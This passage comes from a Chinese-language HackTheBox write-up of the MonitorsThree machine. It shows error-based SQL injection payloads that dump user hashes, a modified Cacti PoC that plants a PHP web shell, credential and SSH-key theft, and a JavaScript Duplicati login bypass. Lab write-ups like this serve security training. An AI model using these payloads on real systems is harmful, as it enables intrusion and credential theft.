monitorsthree_db -T <span class="built_in">users</span> --dump</span><br><span class="line">+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+</span><br><span class="line">| <span class="built_in">id</span> | username  | email                       | password                         | name              | position              | dob        | start_date | salary    |</span><br><span class="line">+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+</span><br><span class="line">| 2  | admin     | admin@monitorsthree.htb     | 31a181c8372e3afc59dab863430610e8 | Marcus Higgins    | Super User            | 1978-04-25 | 2021-01-12 | 320800.00 |</span><br><span class="line">| 7  | dthompson | mwatson@monitorsthree.htb   | c585d01f2eb3e6e1073e92023088a3dd | Michael Watson    | Website Administrator | 1985-02-15 | 2021-05-10 | 75000.00  |</span><br><span class="line">| 6  | janderson | janderson@monitorsthree.htb | 1e68b6eb86b45f6d92f8f292428f77ac | Jennifer Anderson | Network Engineer      | 1990-07-30 | 2021-06-20 | 68000.00  |</span><br><span class="line">| 5  | mwatson   | dthompson@monitorsthree.htb | 633b683cc128fe244b00f176c8a950f5 | David Thompson    | Database Manager      | 1982-11-23 | 2022-09-15 | 83000.00  |</span><br><span class="line">+----+-----------+-----------------------------+----------------------------------+-------------------+-----------------------+------------+------------+-----------+</span><br></pre></td></tr></table></figure>

<p>然後得到：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240830044022-mrk63qb.png" alt="image-20240830044022-mrk63qb">​</p>
<h3 id="Lets-do-it-manually"><a href="#Lets-do-it-manually" class="headerlink" title="Lets do it manually"></a>Lets do it manually</h3><p>如果時間充足的情況下，建議手動dump，可以參考<a target="_blank" rel="noopener" href="https://github.com/manesec/maketoolkit-db/blob/main/Notes/Mysql%20Fast%20Exploition.md">我的一些筆記</a>，直接複製粘貼稍微修改即可：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"># Dump database</span><br><span class="line">1&#x27; AND ExtractValue(&#x27;&#x27;,Concat(&#x27;=&#x27;,SUBSTRING(  (SELECT group_concat(schema_name) FROM information_schema.schemata) , 1, 10)      )) -- -</span><br><span class="line"></span><br><span class="line">&gt; information_schema, monitorsthree_db</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># Dump Tables </span><br><span class="line">1&#x27; AND ExtractValue(&#x27;&#x27;,Concat(&#x27;=&#x27;,SUBSTRING((select group_concat(concat_ws(&quot;:&quot;,table_name) SEPARATOR &quot;|&quot; ) FROM INFORMATION_SCHEMA.TABLES where table_schema = &quot;monitorsthree_db&quot;) , 1, 50)      )) -- -</span><br><span class="line"></span><br><span class="line">&gt; invoices|customers|changelog|tasks|invoice_task|users</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># Dump Col for users</span><br><span class="line">1&#x27; AND ExtractValue(&#x27;&#x27;,Concat(&#x27;=&#x27;,SUBSTRING((SELECT group_concat(COLUMN_NAME) FROM INFORMATION_SCHEMA.COLUMNS WHERE TABLE_NAME = &#x27;users&#x27;) , 1, 50)      )) -- -</span><br><span class="line"></span><br><span class="line">&gt; id,username,email,password,name,position,dob,start_date,salary</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># select data</span><br><span class="line">1&#x27; AND ExtractValue(&#x27;&#x27;,Concat(&#x27;=&#x27;,SUBSTRING((select group_concat(concat_ws(username,password) SEPARATOR &quot;|&quot; ) FROM monitorsthree_db.users) , 1, 50)      )) -- -</span><br></pre></td></tr></table></figure>

<p>上面的 <code>1,50</code>​ 是 offset， 可以從 <code>1,20</code>​ 然後 <code>20,40</code>​ 這樣。</p>
<p>把hash給一點點的dump出來：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825160614-q4sjav5.png" alt="image">​</p>
<h3 id="Time-to-hashcat"><a href="#Time-to-hashcat" class="headerlink" title="Time to hashcat"></a>Time to hashcat</h3><p>最後得到下列的hash，並且用hashcat 爆破：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">31a181c8372e3afc59dab863430610e8 : greencacti2001</span><br><span class="line">c585d01f2eb3e6e1073e92023088a3dd</span><br><span class="line">1e68b6eb86b45f6d92f8f292428f77ac</span><br><span class="line">633b683cc128fe244b00f176c8a950f5</span><br></pre></td></tr></table></figure>

<p>嘗試使用 <code>admin:greencacti2001</code>​ 發現可以進入後臺：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825161112-v2xmp82.png" alt="image">​</p>
<p>那麼試一下登錄 <code>cacti.monitorsthree.htb</code>​，結果也成功的進去了：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825162024-npo2ix6.png" alt="image">​</p>
<p>‍</p>
<h2 id="0x4-Exploit-cacti-to-get-web-shell"><a href="#0x4-Exploit-cacti-to-get-web-shell" class="headerlink" title="0x4 Exploit cacti to get web shell"></a>0x4 Exploit cacti to get web shell</h2><p>因為這個界面很古老是，所以利用的可能性會比較高，於是谷歌查一下有沒有什麼漏洞可以利用，結果看到：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825162235-mnnsiua.png" alt="image">​</p>
<p>看到這篇： <a target="_blank" rel="noopener" href="https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88">https://github.com/Cacti/cacti/security/advisories/GHSA-7cmj-g5qc-pj88</a></p>
<p>根據上面的poc稍微修改一下得到：</p>
<figure class="highlight php"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br></pre></td><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line"></span><br><span class="line"><span class="variable">$xmldata</span> = <span class="string">&quot;&lt;xml&gt;</span></span><br><span class="line"><span class="string">   &lt;files&gt;</span></span><br><span class="line"><span class="string">       &lt;file&gt;</span></span><br><span class="line"><span class="string">           &lt;name&gt;resource/test.php&lt;/name&gt;</span></span><br><span class="line"><span class="string">           &lt;data&gt;%s&lt;/data&gt;</span></span><br><span class="line"><span class="string">           &lt;filesignature&gt;%s&lt;/filesignature&gt;</span></span><br><span class="line"><span class="string">       &lt;/file&gt;</span></span><br><span class="line"><span class="string">   &lt;/files&gt;</span></span><br><span class="line"><span class="string">   &lt;publickey&gt;%s&lt;/publickey&gt;</span></span><br><span class="line"><span class="string">   &lt;signature&gt;&lt;/signature&gt;</span></span><br><span class="line"><span class="string">&lt;/xml&gt;&quot;</span>;</span><br><span class="line"><span class="variable">$filedata</span> = <span class="string">&#x27;&lt;?php system($_GET[&quot;cmd&quot;]) ?&gt;&#x27;</span>;</span><br><span class="line"><span class="variable">$keypair</span> = <span class="title function_ invoke__">openssl_pkey_new</span>(); </span><br><span class="line"><span class="variable">$public_key</span> = <span class="title function_ invoke__">openssl_pkey_get_details</span>(<span class="variable">$keypair</span>)[<span class="string">&quot;key&quot;</span>]; </span><br><span class="line"><span class="title function_ invoke__">openssl_sign</span>(<span class="variable">$filedata</span>, <span class="variable">$filesignature</span>, <span class="variable">$keypair</span>, OPENSSL_ALGO_SHA256);</span><br><span class="line"><span class="variable">$data</span> = <span class="title function_ invoke__">sprintf</span>(<span class="variable">$xmldata</span>, <span class="title function_ invoke__">base64_encode</span>(<span class="variable">$filedata</span>), <span class="title function_ invoke__">base64_encode</span>(<span class="variable">$filesignature</span>), <span class="title function_ invoke__">base64_encode</span>(<span class="variable">$public_key</span>));</span><br><span class="line"><span class="title function_ invoke__">openssl_sign</span>(<span class="variable">$data</span>, <span class="variable">$signature</span>, <span class="variable">$keypair</span>, OPENSSL_ALGO_SHA256);</span><br><span class="line"><span class="title function_ invoke__">file_put_contents</span>(<span class="string">&quot;test.xml&quot;</span>, <span class="title function_ invoke__">str_replace</span>(<span class="string">&quot;&lt;signature&gt;&lt;/signature&gt;&quot;</span>, <span class="string">&quot;&lt;signature&gt;&quot;</span>.<span class="title function_ invoke__">base64_encode</span>(<span class="variable">$signature</span>).<span class="string">&quot;&lt;/signature&gt;&quot;</span>, <span class="variable">$data</span>));</span><br><span class="line"><span class="title function_ invoke__">system</span>(<span class="string">&quot;cat test.xml | gzip -9 &gt; test.xml.gz; rm test.xml&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>

<p>然後製作惡意packet：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ php exp.php </span><br><span class="line">$ <span class="built_in">ls</span></span><br><span class="line">exp.php  test.xml.gz</span><br></pre></td></tr></table></figure>

<p>上傳後得到</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825162452-adkfdhy.png" alt="image">​</p>
<p>點擊導入之後，訪問看看：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825162433-1aqq7ih.png" alt="image">​</p>
<p>得到了一個web shell，並且從這裡獲得reverse shell。</p>
<h2 id="0x5-shell-as-marcus"><a href="#0x5-shell-as-marcus" class="headerlink" title="0x5 shell as marcus"></a>0x5 shell as marcus</h2><p>這裡需要注意，如果你發現它是404說明shell已經被定時任務給刪掉了，所以重新上一次即可。</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825162626-a4ob2tq.png" alt="image">​</p>
<p>而且也看到這裡有個叫marcus的users，拿到了webshell以後，看一下有哪些用戶</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">www_data@monitorsthree:/var/www/html/cacti/resource$ <span class="built_in">cat</span> /etc/passwd | grep sh</span><br><span class="line">root:x:0:0:root:/root:/bin/bash</span><br><span class="line">sshd:x:106:65534::/run/sshd:/usr/sbin/nologin</span><br><span class="line">fwupd-refresh:x:112:118:fwupd-refresh user,,,:/run/systemd:/usr/sbin/nologin</span><br><span class="line">marcus:x:1000:1000:Marcus:/home/marcus:/bin/bash</span><br></pre></td></tr></table></figure>

<p>於是這個<code>marcus</code>​用戶也存在與 cacti 的數據庫裡面，所以去扒一下數據庫：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line">www_data@monitorsthree:~$ <span class="built_in">cat</span> /var/www/html/cacti/include/config.php</span><br><span class="line">...</span><br><span class="line">/**</span><br><span class="line"> * Make sure these values reflect your actual database/host/user/password</span><br><span class="line"> */</span><br><span class="line"></span><br><span class="line"><span class="variable">$database_type</span>     = <span class="string">&#x27;mysql&#x27;</span>;</span><br><span class="line"><span class="variable">$database_default</span>  = <span class="string">&#x27;cacti&#x27;</span>;</span><br><span class="line"><span class="variable">$database_hostname</span> = <span class="string">&#x27;localhost&#x27;</span>;</span><br><span class="line"><span class="variable">$database_username</span> = <span class="string">&#x27;cactiuser&#x27;</span>;</span><br><span class="line"><span class="variable">$database_password</span> = <span class="string">&#x27;cactiuser&#x27;</span>;</span><br><span class="line"><span class="variable">$database_port</span>     = <span class="string">&#x27;3306&#x27;</span>;</span><br><span class="line"><span class="variable">$database_retries</span>  = 5;</span><br><span class="line"><span class="variable">$database_ssl</span>      = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$database_ssl_key</span>  = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="variable">$database_ssl_cert</span> = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="variable">$database_ssl_ca</span>   = <span class="string">&#x27;&#x27;</span>;</span><br><span class="line"><span class="variable">$database_persist</span>  = <span class="literal">false</span>;</span><br><span class="line"></span><br><span class="line">...</span><br></pre></td></tr></table></figure>

<p>得到數據庫的賬號密碼，</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line">www_data@monitorsthree:~$ mysql -u cactiuser -p </span><br><span class="line">Enter password:  cactiuser </span><br><span class="line">Welcome to the MariaDB monitor.  Commands end with ; or \g.</span><br><span class="line">Your MariaDB connection <span class="built_in">id</span> is 1573</span><br><span class="line">Server version: 10.6.18-MariaDB-0ubuntu0.22.04.1 Ubuntu 22.04</span><br><span class="line"></span><br><span class="line">Copyright (c) 2000, 2018, Oracle, MariaDB Corporation Ab and others.</span><br><span class="line"></span><br><span class="line">Type <span class="string">&#x27;help;&#x27;</span> or <span class="string">&#x27;\h&#x27;</span> <span class="keyword">for</span> <span class="built_in">help</span>. Type <span class="string">&#x27;\c&#x27;</span> to clear the current input statement.</span><br><span class="line"></span><br><span class="line">MariaDB [(none)]&gt; show databases;</span><br><span class="line">+--------------------+</span><br><span class="line">| Database           |</span><br><span class="line">+--------------------+</span><br><span class="line">| cacti              |</span><br><span class="line">| information_schema |</span><br><span class="line">| mysql              |</span><br><span class="line">+--------------------+</span><br><span class="line">3 rows <span class="keyword">in</span> <span class="built_in">set</span> (0.001 sec)</span><br><span class="line"></span><br><span class="line">MariaDB [(none)]&gt; use cacti;</span><br><span class="line">Reading table information <span class="keyword">for</span> completion of table and column names</span><br><span class="line">You can turn off this feature to get a quicker startup with -A</span><br><span class="line"></span><br><span class="line">Database changed</span><br><span class="line"></span><br><span class="line">MariaDB [cacti]&gt; show tables;</span><br><span class="line">....</span><br><span class="line">| user_auth                           |</span><br><span class="line">| user_auth_cache                     |</span><br><span class="line">| user_auth_group                     |</span><br><span class="line">| user_auth_group_members             |</span><br><span class="line">| user_auth_group_perms               |</span><br><span class="line">| user_auth_group_realm               |</span><br><span class="line">| user_auth_perms                     |</span><br><span class="line">...</span><br><span class="line"></span><br><span class="line">MariaDB [cacti]&gt; <span class="keyword">select</span> * from user_auth;</span><br></pre></td></tr></table></figure>

<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825163211-ughhrb5.png" alt="image">​</p>
<p>得到了一串hash：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">|  1 | admin    | $2y$10<span class="variable">$tjPSsSP6UovL3OTNeam4Oe24TSRuSRRApmqf5vPinSer3mDuyG90G</span> </span><br><span class="line">|  3 | guest    | $2y$10<span class="variable">$SO8woUvjSFMr1CDo8O3cz</span>.S6uJoqLaTe6/mvIcUuXzKsATo77nLHu </span><br><span class="line">|  4 | marcus   | $2y$10<span class="variable">$Fq8wGXvlM3Le</span>.5LIzmM9weFs9s6W2i1FLg3yrdNGmkIaxo79IBjtK </span><br></pre></td></tr></table></figure>

<p>同樣的跑一下hashcat：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825053613-lbq44vg.png" alt="image">​</p>
<p>如無意外的話就是這個用戶的密碼：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">www-data@monitorsthree:~/html/cacti/resource$ su marcus</span><br><span class="line">Password: 12345678910</span><br><span class="line">marcus@monitorsthree:/var/www/html/cacti/resource$ <span class="built_in">id</span></span><br><span class="line">uid=1000(marcus) gid=1000(marcus) <span class="built_in">groups</span>=1000(marcus)</span><br></pre></td></tr></table></figure>

<p>得到 user.txt</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825163333-7edybec.png" alt="image">​</p>
<h2 id="0x6-Found-Duplicati-Backup-services"><a href="#0x6-Found-Duplicati-Backup-services" class="headerlink" title="0x6 Found Duplicati Backup services"></a>0x6 Found Duplicati Backup services</h2><p>隨便枚舉一下看到本地有很多奇怪的端口：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br></pre></td><td class="code"><pre><span class="line">marcus@monitorsthree:/var/www/html/cacti/resource$ ss -tlunp</span><br><span class="line">Netid State  Recv-Q Send-Q Local Address:Port  Peer Address:PortProcess</span><br><span class="line">udp   UNCONN 0      0      127.0.0.53%lo:53         0.0.0.0:*  </span><br><span class="line">udp   UNCONN 0      0            0.0.0.0:68         0.0.0.0:*  </span><br><span class="line">tcp   LISTEN 0      500          0.0.0.0:8084       0.0.0.0:*  </span><br><span class="line">tcp   LISTEN 0      4096       127.0.0.1:8200       0.0.0.0:*  </span><br><span class="line">tcp   LISTEN 0      4096       127.0.0.1:35419      0.0.0.0:*  </span><br><span class="line">tcp   LISTEN 0      70         127.0.0.1:3306       0.0.0.0:*  </span><br><span class="line">tcp   LISTEN 0      511          0.0.0.0:80         0.0.0.0:*  </span><br><span class="line">tcp   LISTEN 0      4096   127.0.0.53%lo:53         0.0.0.0:*  </span><br><span class="line">tcp   LISTEN 0      128          0.0.0.0:22         0.0.0.0:*  </span><br><span class="line">tcp   LISTEN 0      511             [::]:80            [::]:*  </span><br><span class="line">tcp   LISTEN 0      128             [::]:22            [::]:*  </span><br></pre></td></tr></table></figure>

<p>所以導出 ssh key， 使用ssh做端口轉發：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">marcus@monitorsthree:/var/www/html/cacti/resource$ <span class="built_in">cat</span> ~/.ssh/id_rsa</span><br><span class="line">-----BEGIN RSA PRIVATE KEY-----</span><br><span class="line">MIIEpAIBAAKCAQEAxVGKRkjLCwQ3HCIYP1nv7a+tvqJpEl3ePbuNRP2wmz8aetuY</span><br><span class="line">................................................................</span><br><span class="line">qtRLndgBKxoVHbww2fytBKGly1+1c3oRYaoqRAhK5tnKV0WoXFafyw==</span><br><span class="line">-----END RSA PRIVATE KEY-----</span><br></pre></td></tr></table></figure>

<p>注意，這裡每個機器的key都不一樣。</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">$ ssh  -L 127.0.0.4:8084:127.0.0.1:8084 -L 127.0.0.1:33287:127.0.0.1:33287 -L 127.0.0.1:8200:127.0.0.1:8200 -L 127.0.0.1:3306:127.0.0.1:3306 -i marcus_key marcus@10.129.98.192 </span><br><span class="line">Last login: Sun Aug 25 08:38:04 2024 from 10.10.16.39</span><br><span class="line">marcus@monitorsthree:~$ </span><br></pre></td></tr></table></figure>

<p>然後本地訪問一下這些端口：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825163841-v8br6xw.png" alt="image">​</p>
<p>所以直接去谷歌查一下有沒有可以利用的地方</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825163904-7tnva43.png" alt="image">​</p>
<p>看到這篇：<a target="_blank" rel="noopener" href="https://medium.com/@STarXT/duplicati-bypassing-login-authentication-with-server-passphrase-024d6991e9ee">https://medium.com/@STarXT/duplicati-bypassing-login-authentication-with-server-passphrase-024d6991e9ee</a></p>
<p>如果可以獲得 <code>Duplicati</code>​ 的數據庫文件，通常名字是 <code>Duplicati-server.sqlite</code>​ ，就可以找到服務器加密的密碼，便可直接登陸進去，既然不知道數據庫藏在哪裡，那就直接 <code>find</code>​ 一下：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">marcus@monitorsthree:~$ find / -iname <span class="string">&#x27;Duplicati-server.sqlite&#x27;</span> 2&gt;/dev/null</span><br><span class="line">/opt/duplicati/config/Duplicati-server.sqlite</span><br></pre></td></tr></table></figure>

<p>發現有讀取的權限，於是然後下載到本地打開看一下：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825164029-bn3cms3.png" alt="image">​</p>
<p>果然有，根據上面的文章製作 <code>saltedpwd</code>​</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825164351-z9svp4a.png" alt="image">​</p>
<p>然後你就可以登錄到後臺頁面了，操作如下：</p>
<iframe src="/maneplugin/viewerjs/slideshow.html#https://raw.githubusercontent.com/manesec/blog-open-file/master/encryption/0002.pdf?JHkkajlUJDNURFEzR1M1bFNrTndpTjRFc3hWQi8kSnl1M0NXTFRRNG1JeXB3LzAzSk90UGxlNnZkcGFvWS94Nko5YnJiVjlQNA==" width="100%" height="580px" frameborder="0" loading="lazy" allowfullscreen></iframe> 


<p>Payload 如下：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">var</span> nonce = <span class="built_in">decodeURIComponent</span>(<span class="string">&quot;&lt; session-nonce &gt;&quot;</span>);</span><br><span class="line"></span><br><span class="line"><span class="title class_">CryptoJS</span>.<span class="title class_">SHA256</span>(<span class="title class_">CryptoJS</span>.<span class="property">enc</span>.<span class="property">Hex</span>.<span class="title function_">parse</span>(<span class="title class_">CryptoJS</span>.<span class="property">enc</span>.<span class="property">Base64</span>.<span class="title function_">parse</span>(nonce) + <span class="string">&#x27;59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a&#x27;</span>)).<span class="title function_">toString</span>(<span class="title class_">CryptoJS</span>.<span class="property">enc</span>.<span class="property">Base64</span>);</span><br></pre></td></tr></table></figure>

<p>如果慢一點的話，上面的nonce很快就超時了，因爲我是手殘玩家，就根據 <code>/login/login.js?v=2.0.8.1</code>​ 稍微修改下，利用 javascript 自動計算相對應的hash，這樣就可以直接登錄，整合後的代碼如下，按下<code>F12</code>​可以直接把下列的代碼貼到控制臺上，然後閉上眼睛按下回車：</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br></pre></td><td class="code"><pre><span class="line">$.<span class="title function_">ajax</span>(&#123;</span><br><span class="line">    <span class="attr">url</span>: <span class="string">&#x27;./login.cgi&#x27;</span>,</span><br><span class="line">    <span class="attr">type</span>: <span class="string">&#x27;POST&#x27;</span>,</span><br><span class="line">    <span class="attr">dataType</span>: <span class="string">&#x27;json&#x27;</span>,</span><br><span class="line">    <span class="attr">data</span>: &#123;<span class="string">&#x27;get-nonce&#x27;</span>: <span class="number">1</span>&#125;</span><br><span class="line">&#125;)</span><br><span class="line">.<span class="title function_">done</span>(<span class="keyword">function</span>(<span class="params">data</span>) &#123;</span><br><span class="line">    <span class="keyword">var</span> noncedpwd = <span class="title class_">CryptoJS</span>.<span class="title class_">SHA256</span>(<span class="title class_">CryptoJS</span>.<span class="property">enc</span>.<span class="property">Hex</span>.<span class="title function_">parse</span>(<span class="title class_">CryptoJS</span>.<span class="property">enc</span>.<span class="property">Base64</span>.<span class="title function_">parse</span>(data.<span class="property">Nonce</span>) + <span class="string">&#x27;59be9ef39e4bdec37d2d3682bb03d7b9abadb304c841b7a498c02bec1acad87a&#x27;</span>)).<span class="title function_">toString</span>(<span class="title class_">CryptoJS</span>.<span class="property">enc</span>.<span class="property">Base64</span>);</span><br><span class="line"></span><br><span class="line">    $.<span class="title function_">ajax</span>(&#123;</span><br><span class="line">        <span class="attr">url</span>: <span class="string">&#x27;./login.cgi&#x27;</span>,</span><br><span class="line">        <span class="attr">type</span>: <span class="string">&#x27;POST&#x27;</span>,</span><br><span class="line">        <span class="attr">dataType</span>: <span class="string">&#x27;json&#x27;</span>,</span><br><span class="line">        <span class="attr">data</span>: &#123;<span class="string">&#x27;password&#x27;</span>: noncedpwd &#125;</span><br><span class="line">    &#125;)</span><br><span class="line">    .<span class="title function_">done</span>(<span class="keyword">function</span>(<span class="params">data</span>) &#123;</span><br><span class="line">        <span class="variable language_">window</span>.<span class="property">location</span> = <span class="string">&#x27;./&#x27;</span>;</span><br><span class="line">    &#125;)</span><br><span class="line">    .<span class="title function_">fail</span>(<span class="keyword">function</span>(<span class="params">data</span>) &#123;</span><br><span class="line">        <span class="keyword">var</span> txt = data;</span><br><span class="line">        <span class="keyword">if</span> (txt &amp;&amp; txt.<span class="property">statusText</span>)</span><br><span class="line">            txt = txt.<span class="property">statusText</span>;</span><br><span class="line">        <span class="title function_">alert</span>(<span class="string">&#x27;Login failed: &#x27;</span> + txt);</span><br><span class="line">    &#125;);</span><br><span class="line">&#125;)</span><br></pre></td></tr></table></figure>

<p>如下圖所示：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825172520-xjhstdu.png" alt="image">​</p>
<p>進去了之後，就要觀察一下環境：</p>
<p>從裡面的目錄可以觀察到，似乎在docker裡面：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825172938-0rtdp30.png" alt="image">​</p>
<p>然後這裡的特徵最明顯：</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825173022-2jjoopn.png" alt="image">​</p>
<p>你可以觀察到主機的 <code>/</code>​ 連接到了 docker裡面的 <code>/source</code>​ ，因爲網頁服務器在宿主機上，類似 <code>-v /:/source</code>​ 。</p>
<p>​<img src="https://relay-img.manesec.com/maneblog/hackthebox/2024/08-e1v954Oqz7Kpv6Ka-MonitorsThree/image-20240825173042-l9c2vur.png" alt="image">​</p>
<p>‍</p>
<h2 id="0x7-Exploit-Duplicati"><a href="#0x7-Exploit-Duplicati" class="headerlink" title="0x7 Exploit Duplicati"></a>0x7 Exploit Duplicati</h2><p>三種exploit的方法。</p>
<h3 id="ESC-1-run-script-before"><a href="#ESC-1-run-script-before" class="headerlink" title="ESC 1 - run-script-before"></a>ESC 1 - run-script-before</h3><p>然後去谷歌查一下有沒有辦法執行一些命令，</p>
